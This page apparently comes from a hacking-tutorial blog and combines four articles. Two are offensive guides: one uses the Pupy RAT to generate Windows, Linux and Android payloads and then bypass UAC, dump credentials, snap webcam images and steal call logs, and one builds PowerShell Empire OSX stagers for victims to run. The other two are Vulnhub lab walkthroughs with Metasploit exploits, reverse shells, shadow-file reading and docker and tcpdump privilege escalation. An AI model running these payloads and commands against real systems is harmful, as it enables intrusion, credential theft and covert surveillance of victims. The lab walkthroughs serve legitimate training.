Command & Control Tool: Pupy

In this article, we will learn to exploit Windows, Linux and Android with pupy command and control tool.

Table of Content :

Introduction
Installation
Windows Exploitation
Windows Post Exploitation
Linux Exploitation
Linux Post Exploitation
Android Exploitation
Android Post Exploitation

Introduction

Pupy is a cross-platform, post exploitation tool as well as a multi-function RAT. It’s written in python which makes it very convenient. It also has low detectability that’s why it’s a great tool for the red team. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

It uses a reflected DLL to load python interpreter from memory which is great as nothing will be shown in the disk. It doesn’t have any special dependencies. It can also migrate into other processes. The communication protocols of pupy are modular and stackable. It can execute non-interactive commands on multiple hosts at once. All the interactive shells can be accessed remotely.

Installation

To install pupy execute the following commands one by one :

git clone https://github.com/n1nj4sec/pupy
ls
./install.sh

git clone https://github.com/n1nj4sec/pupy

./install.sh

Now download all the requirements using pip like the following command :

cd pupy
pip install -r requirements.txt

1 2	cd pupy pip install -r requirements.txt

Now run pupy using the following command :

./pupysh.py

1	./pupysh.py

This command will open the prompt where you will get your session.

Now, to create our payload we will use the pupygen. Use the following help command to see all the attributes which we can use :

./pupygen.py -h

1	./pupygen.py -h

Windows Exploitation

Now we will create a windows payload in order to exploit windows with the following command :

./pupygen.py -O windows -A x86 -o /root/Desktop/shell.exe

1	./pupygen.py -O windows -A x86 -o /root/Desktop/shell.exe

Here,

-O : refers to the operating system

-A : refers to the architecture

-o : refers to the output file path

When you are successful in executing the shell.exe in the victims’ PC, you will have your session as shown in the image :

Windows Post Exploitation

Further, there are number of post-exploits you can use, they are pretty simple to use. Some of them we have shown in our article. For message dialogue box to pop up on the target machine you can use the following command :

msgbox –-title hack "you have been hacked"

1	msgbox –-title hack "you have been hacked"

As per the command, following dialogue box will open on the target machine :

You can also access the desktop using the remote desktop module with the following command :

rdesktop -r 0

1	rdesktop -r 0

After executing the above command you can remotely access the desktop just as shown in the image below :

For bypass UAC, we have the simplest command in pupy i.e. the following :

bypassuac -r

1	bypassuac -r

The above command will recreate a session with admin privileges as shown in the image below :

Then for getting the system’s credentials, you can use the following command :

creddump

creddump

And as you can see in the image below, you get the information about all the credentials :

Using pupy, we can also migrate our session to a particular process. With migrate command, the attributes of the command are shown in the image below :

With ps command, you can find out the process ID number of all the processes running on the target PC, along with letting you know which process is running. Knowing the process ID is important as it will be required in the migrate command and will help us to migrate our session as we desire.

Now, as we know the processes that are running, we can use it to migrate our session. For this, type the following command :

migrate -p explorer.exe -k

1	migrate -p explorer.exe -k

And then a new session will be created as desired.

Linux Exploitation

To exploit Linux, we will have to generate Linux payload with the following command :

./pupygen.py -O linux -A x64 -o /root/Desktop.shell

1	./pupygen.py -O linux -A x64 -o /root/Desktop.shell

Once you execute the malicious file in the target system, you will have your session as shown in the image below :

As you have a session now, you can check if the target machine is running on a VM or is it a host machine with the following command :

check_vm

check_vm

And as you can see in the image below that the target machine is, in fact, running on VM

Linux Post Exploitation

In post-exploitation, you can have detailed information about the target system with the following command :

privesc_checker --linenum

1	privesc_checker --linenum

With pupy, you can also find out all the exploits that are working on the target system with the help of the following command :

exploit_suggester –shell /bin/bash

1	exploit_suggester –shell /bin/bash

As you can see that in the image below, it has given us the list of all the exploits to which the target system is vulnerable.

To get the basic information about the target system such as IP address, MAC address, etc. you can use the following command :

get_info

get_info

Android Exploitation

Now we will create an android payload in order to exploit windows with the following command :

./pupygen.py -O android -o /root/shell.apk

1	./pupygen.py -O android -o /root/shell.apk

When you are successful in installing the shell.apk in the victims’ Android Phone, you will have your session as shown in the image :

Android Post Exploitation

In post-exploitation, you can grab the call logs stored on the target device with the following command :

call -a -output-folder /root/call

1	call -a -output-folder /root/call

Here,

-a : refers to getting all the call details

-output-folder : refers to the path of the output file containing the call logs

We will use the cat command on callDetails.txt to read the call logs.

To get the camera snap from the primary camera on the target device, you can use the following command :

webcamsnap -v

1	webcamsnap -v

Here,

-v : refers to view the image directly

As we can see in the given image that we have the snap captured and stored at the given location.

To get the information about the installed packages or apps on the target device, you can use the following command :

apps -a -d

1	apps -a -d

Here,

-a : refers to getting all the installed packages details

-d : refers to view detailed information

As we can see in the given image that we have detailed information about the packages or apps installed on the target machine.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

Multiple Ways to Exploiting OSX using PowerShell Empire

In this article, we will learn multiple ways to how to hack OS X using empire. There are various stagers given in empire for the same and we use a few of them in our article. Method to attack OS X is similar to that of windows. For the beginner’s guide to pen-test OS X click here.

Table of Content :

osx/macho
osx/applescript
osx/launcher
osx/jar
osx/safari_launcher

osx/macho

The first stager we will use to attack is osx/macho. This stager will create a Mach-O file, which is an executable format of binaries in OS X. This file format is made for OS X specifically. This file format informs the system about the order in which code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.

The listener creation is the same as windows, use the http listener. Once the listener is created, execute the following set of commands:

usestager osx/macho
set Listener http
set OutFile shell.macho
execute

usestager osx/macho

set Listener http

set OutFile shell.macho

execute

As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :

osx/applescript

The next stager we will use is osx/applescript. This stager will create a code in an apple script, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stager for pen-testing Mac. To create the malicious said apple script run the following set of commands :

usestager osx/applescript
set Listener http
execute

usestager osx/applescript

set Listener http

execute

Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :

As soon as the code is executed in the victim’s PC, you will have your session as shown in the image :

osx/launcher

The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :

usestager osx/launcher
execute

1 2	usestager osx/launcher execute

copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :

osx/jar

The nest stager which we will use is osx/jar. This stager creates a jar file which is a Java archive file. This file format is used for compressed java files which when extracted as run as desired. This file extension is specifically made for Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :

usestager osx/jar
set Listener http
set OutFile out.jar
execute

usestager osx/jar

set Listener http

set OutFile out.jar

execute

The stager will create a jar file as told above, as the said file will be executed in the victim’s system, you will have your session as shown in the image :

osx/safari_launcher

The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:

usestager osx/safari_launcher
set Listener http
execute

usestager osx/safari_launcher

set Listener http

execute

Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :

So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher Contact Here

Web Developer: 1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “Web Developer: 1”. The credit for making this VM machine goes to “Fred Wemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

IP Discovery using netdiscover
Network scanning (Nmap)
Surfing HTTP service port
Enumerating directories using Dirb
Finding “cap” file
Analyzing the “cap” file and finding WordPress password
Installing the vulnerable plugin in WordPress
Exploiting the vulnerable to get a reverse shell
Finding SSH login and password
Finding application is a sudoers list
Getting flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

1	netdiscover

We found our target –> 192.168.19.131

Our next step is to scan our target with nmap.

nmap -p- -sV 192.168.19.131

1	nmap -p- -sV 192.168.19.131

From the NMAP Version Scan we enumerated the following details:

22 Port having the SSH service and 80 Port having HTTP service.

As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.

As we couldn’t find any links on this page. So, we will do a directory bruteforcing using dirb scan. From the scanning result, we choose the highlighted directory for further enumeration.

So, we opened this directory in the browser and found a cap file.

We will open cap file in Wireshark, and you can see that we found the username and password through it.

And using the above username and password, you can directly log on to the website. As you can see that the website is in WordPress. And I remember that there is a plug-in of WordPress that is vulnerable. So, in the plugin I added a new plugin i.e. ReFlex Gallery as you can in the image below:

Now, we will use the in-build exploit from Metasploit to exploit this plugin and get a session. And for this, we use the following set of commands:

use exploit/unix/wepapp/wp_reflexgallery_file_upload
set rhosts 192.168.19.131
exploit

use exploit/unix/wepapp/wp_reflexgallery_file_upload

set rhosts 192.168.19.131

exploit

Once we got the session, I navigated through it a lot and found the wp-config.php, now, when reading the config file, we find username and password.

Now we find credentials inside the file, we use this credential to log in through SSH. After logging in we check the sudoers list and find we can run “tcpdump” as the root user.

ssh webdeveloper@192.168.19.131
sudo -l

1 2	ssh webdeveloper@192.168.19.131 sudo -l

So, we can execute a file using tcpdump, so we use the following command to execute “ls -al /root” command. Now the command will be executed only when tcpdump captures a packet.

COMMAND='ls -al /root'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

After starting tcpdump, in a new terminal, we connect to the target machine through SSH. Now we send a TCP packet to the 127.0.0.1 using netcat. We had to use this locally as we started tcpdump on the loopback interface.

nc -v -z -n -w 1 127.0.0.1 1

1	nc -v -z -n -w 1 127.0.0.1 1

As soon as we send the packet, our command is executed and we can see all the files inside “/root” directory. Inside “/root” directory, we find a file called “flag.txt”. We are again going to use tcpdump command to open “flag.txt” and are able to get the final flag.

COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

HackInOS:1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “HackInOS: 1”. The credit for making this VM machine goes to “Fatih Çelik” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

IP Discovery using netdiscover
Network scanning (Nmap)
Surfing HTTP service port
Finding upload directory
Finding source code for a web application
Getting reverse shell
Pivoting using Metasploit
Logging in through MySQL and find an SSH credentials
Logging in through SSH
Getting the root shell and finding the flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

1	netdiscover

We found our target –> 192.168.1.101

Our next step is to scan our target with nmap.

nmap -p- -sV 192.168.1.101

1	nmap -p- -sV 192.168.1.101

The NMAP output shows us that there are 2 ports open: 22(SSH), 8000(HTTP)

We find that port 8000 is running HTTP, so we open the IP in our browser and find there is WordPress CMS running on the web server.

We don’t find any vulnerable plugin or theme on the CMS, so we run a dirb scan to enumerate the directories on the target machine.

dirb http://192.168.1.101:8000/

1	dirb http://192.168.1.101:8000/

Dirb scan gave us “robots.txt”, we open it and find a link to “upload.php” and “/uploads”.

We open upload.php and find a page where we can upload images. Here we try to upload an image and get a smiling face, it looks like it means there is an error uploading the file.

We open the source code of the web page and inside a comment we find a GitHub link.

We open the GitHub link and find there is a source code for the upload.php file.

Now to upload the image we just need to add “GIF98” to the start of the php reverse shellcode we want to upload.

Now when we upload our php reverse shell, we are successfully able to upload the shell. But we do not know the filename after it is uploaded on the server.

Taking a look at the source code of “upload.php” we find that after the shell is uploaded the file gets renamed to “md5(<filename><random number )between 1 – 100>.<file extension>”. So, we create a python script that creates a text file filled with all the 100 md5 filename. You can download the script from here.

Now we run the python script and use dirb to bruteforce the new file name.

dirb http://192.168.1.101:8000/uploads/ dict.txt

1	dirb http://192.168.1.101:8000/uploads/ dict.txt

We set up the listener, and again run the dirb command again and get a reverse shell.

nc -lvp 1234
dirb http://192.168.1.101:8000/uploads/ dict.txt

1 2	nc -lvp 1234 dirb http://192.168.1.101:8000/uploads/ dict.txt

After getting a reverse shell, we spawn a TTY shell and we find that we are inside a Docker container. We find all files with SUID bit set and find that “tail” command has SUID bit set. So, we use the “tail” command to open “/etc/shadow”.

python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
tail -c1G /etc/shadow

python -c "import pty;pty.spawn('/bin/bash')"

find / -perm -4000 2>/dev/null

tail -c1G /etc/shadow

We get the password for “root” user from /etc/shadow file and we copy and save it in our system. We crack the hash using john the ripper and find the password to be “john”.

john hash

john hash

After finding the password, we switch to the root user. After becoming a root user, we switch to “/root” directory and find a file called “flag”. We open the “flag” file and find nothing useful.

Further enumerating the system, inside /var/www/html/wp-config.php. We open the username and password for database login. There is no MySQL service running on the machine and we are also not able to login through SSH using these credentials.

Getting back inside /root directory, we find a file called “.port”. We open the file and find a hint to look for other containers.

To further interact with the shell, we get a meterpreter reverse shell. We use the web_delivery module in Metasploit-framework to get a reverse shell.

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > setg lhost eth0
msf5 exploit(multi/script/web_delivery) > setg lport 8888
msf5 exploit(multi/script/web_delivery) > run

msf5 > use exploit/multi/script/web_delivery

msf5 exploit(multi/script/web_delivery) > setg lhost eth0

msf5 exploit(multi/script/web_delivery) > setg lport 8888

msf5 exploit(multi/script/web_delivery) > run

We copy the command provided by web_delivery module and run it on the target machine.

As soon as we run the command on the target machine, we get a reverse shell. After getting a reverse shell, we use autoroute module in Metasploit-framework for pivoting.

msf5 > use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > set session 1
msf5 post(multi/manage/autoroute) > exploit

msf5 > use post/multi/manage/autoroute

msf5 post(multi/manage/autoroute) > set session 1

msf5 post(multi/manage/autoroute) > exploit

Then we use the ping_sweep module to find all the machines on the new network.

msf5 > use post/multi/gather/ping_sweep
msf5 post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
msf5 post(multi/gather/ping_sweep) > set session 1
msf5 post(multi/gather/ping_sweep) > exploit

msf5 > use post/multi/gather/ping_sweep

msf5 post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255

msf5 post(multi/gather/ping_sweep) > set session 1

msf5 post(multi/gather/ping_sweep) > exploit

Then we run a portscan module to find all the ports on all the machines.

msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
msf5 auxiliary(scanner/portscan/tcp) > exploit

msf5 > use auxiliary/scanner/portscan/tcp

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4

msf5 auxiliary(scanner/portscan/tcp) > set threads 10

msf5 auxiliary(scanner/portscan/tcp) > exploit

We find the following ports open on the following machines:

172.18.0.1	22,8000
172.18.0.2	80
172.18.0.3	3306
172.18.0.4	2021

As we know port 3306 is for MySQL service and we also have username and password for WordPress database. So, we can login through MySQL on target “172.18.0.3” and use credentials “wordpress:wordpress”.

meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
mysql -u wordpress -p wordpress -h 172.18.0.3

meterpreter > shell

python -c "import pty;pty.spawn('/bin/bash')"

mysql -u wordpress -p wordpress -h 172.18.0.3

After logging in we check all the databases on the MySQL server.

show databases;

1	show databases;

We now check all the tables available on the database and find a table called “host_ssh_cred”. We check the columns inside the table and find the username and hash of a password.

show tables;
select * from host_ssh_cred;

1 2	show tables; select * from host_ssh_cred;

We save the hash in our system and use john the ripper to crack the hash

john --format=RAW-md5 sshpass

1	john --format=RAW-md5 sshpass

Now we have the credentials for SSH; hummingbird:123456. We login through SSH and now when we run the id command, we find that we are a member of the docker group. Some containers have a dedicated group to allow unprivileged users to manage their containers without having to escalate their privileges. To exploit this vulnerability, we first need to check the docker images that are available.

ssh hummingbirdscyber@192.168.1.101
id
docker images

ssh hummingbirdscyber@192.168.1.101

docker images

We find that the Ubuntu image is available to us, so we use this to create a new docker container and mount the / directory of the host inside a folder called /root. After we run the docker image we go to /root/root and find a file called “flag”. When we open the file, we find our congratulatory flag.

docker run -v /:/root -i -t ubuntu /bin/bash
cd /root
cd root
cat flag

docker run -v /:/root -i -t ubuntu /bin/bash

cd /root

cd root

cat flag

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

Hacking Articles

Raj Chandel's Blog

Command & Control Tool: Pupy

Table of Content :

Introduction

Installation

Windows Exploitation

Windows Post Exploitation

Linux Exploitation

Linux Post Exploitation

Android Exploitation

Android Post Exploitation

Multiple Ways to Exploiting OSX using PowerShell Empire

Table of Content :

osx/macho

osx/applescript

osx/launcher

osx/jar

osx/safari_launcher

Web Developer: 1: Vulnhub Lab Walkthrough

Penetrating Methodology:

HackInOS:1: Vulnhub Lab Walkthrough

Penetrating Methodology: